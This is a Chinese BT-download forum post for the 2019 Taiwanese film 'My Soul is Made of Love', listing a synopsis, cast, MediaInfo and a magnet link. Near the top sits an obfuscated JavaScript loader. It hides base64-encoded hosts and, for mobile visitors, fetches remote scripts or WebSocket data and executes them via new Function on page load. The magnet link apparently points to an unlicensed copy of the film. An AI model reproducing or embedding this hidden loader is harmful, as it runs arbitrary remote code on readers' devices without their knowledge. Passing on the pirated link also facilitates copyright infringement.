我的灵魂是爱做的[国语音轨].My.Soul.is.Made.of.Love.2019.1080p.WEB-DL.H264.AAC 2.18GB

版主小s 1月前 625

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 我的灵魂是爱做的 / My Soul is Made of Love / The Teacher
◎片  名 我的靈魂是愛做的
◎年  代 2019
◎产  地 中国台湾
◎类  别 剧情 / 爱情 / 同性
◎语  言 汉语普通话
◎上映日期 2019-12-06(中国台湾) / 2019-11-21(金马影展)
◎IMDb链接 https://www.imdb.com/title/tt11070412/
◎豆瓣评分 4.9/10 (1705人评价)
◎豆瓣链接 https://movie.douban.com/subject/30468842/
◎片  长 92分钟
◎导  演 陈敏郎 Chen Ming-lang (id:1330442)
◎编  剧 陈敏郎 Chen Ming-lang (id:1330442)
◎演  员 邱志宇 Oscar Chiu (id:1389248)
       张晋豪 Chin-Hao Chang (id:1426933)
       何子华 Tzu-hua Ho (id:1380790)
       张诗盈 Winnie Chang (id:1324912)

◎标  签 同性 / 台湾 / LGBT / 同志 / 台湾电影 / 2019 / 剧情 / 『金馬獎』

◎简  介
  二十六岁的凯文(邱志宇 饰)是一名教师,在学生们眼里,他温文尔雅知书达理,是可以信赖和依靠的对象,与此同时,凯文还有着另一重身份,那就是他是一名同性恋者。在业余时间里,他非常积极的参与到推动同志文化的运动之中。在这样的情况下,他和一位神秘男子(张晋豪 饰)相遇了。                                    
                                两人之间很快就产生了奇妙的化学反应,瞬间天雷勾地火,之后凯文才知道,这个男人不仅已经结婚有了家庭,还患有艾滋病。虽然知道对方是个渣男,但凯文还是无法果断的放弃这段感情,得知了这一切的母亲痛斥儿子,同时,凯文还整日生活在被传染艾滋病的恐惧之中。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 210037862940400404891268968894412126333 (0x9E03D22B09A14704FD888298AC9C787D)
  4. Complete name                            : 我的灵魂是爱做的[email protected].COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 2.18 GiB
  8. Duration                                 : 1 h 31 min
  9. Overall bit rate                         : 3 398 kb/s
  10. Encoded date                             : UTC 2021-08-11 08:50:27
  11. Writing application                      : mkvmerge v52.0.0 ('Secret For The Mad') 64-bit
  12. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 5 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 5 frames
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 31 min
  23. Bit rate                                 : 3 293 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 1 080 pixels
  26. Display aspect ratio                     : 16:9
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.066
  34. Stream size                              : 2.05 GiB (94%)
  35. Writing library                          : x264 core 142
  36. Encoding settings                        : cabac=1 / ref=5 / deblock=1:0:0 / analyse=0x3:0x113 / me=umh / subme=9 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=32 / chroma_me=1 / trellis=1 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=1 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=24 / keyint_min=2 / scenecut=0 / intra_refresh=0 / rc_lookahead=35 / rc=abr / mbtree=1 / bitrate=3293 / ratetol=1.0 / qcomp=0.60 / qpmin=0 / qpmax=69 / qpstep=4 / vbv_maxrate=4939 / vbv_bufsize=7408 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00
  37. Language                                 : Chinese
  38. Default                                  : Yes
  39. Forced                                   : No
  40. Audio
  41. ID                                       : 2
  42. Format                                   : AAC LC
  43. Format/Info                              : Advanced Audio Codec Low Complexity
  44. Codec ID                                 : A_AAC-2
  45. Duration                                 : 1 h 31 min
  46. Bit rate                                 : 192 kb/s
  47. Channel(s)                               : 2 channels
  48. Channel layout                           : L R
  49. Sampling rate                            : 44.1 kHz
  50. Frame rate                               : 43.066 FPS (1024 SPF)
  51. Compression mode                         : Lossy
  52. Stream size                              : 126 MiB (6%)
  53. Language                                 : Chinese
  54. Default                                  : Yes
  55. Forced                                   : No


TAGS 剧情 爱情 同性

磁力链:
  • magnet:?xt=urn:btih:B76202B54385BAA991DBA0B6BBEDAE4859E3E6FF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回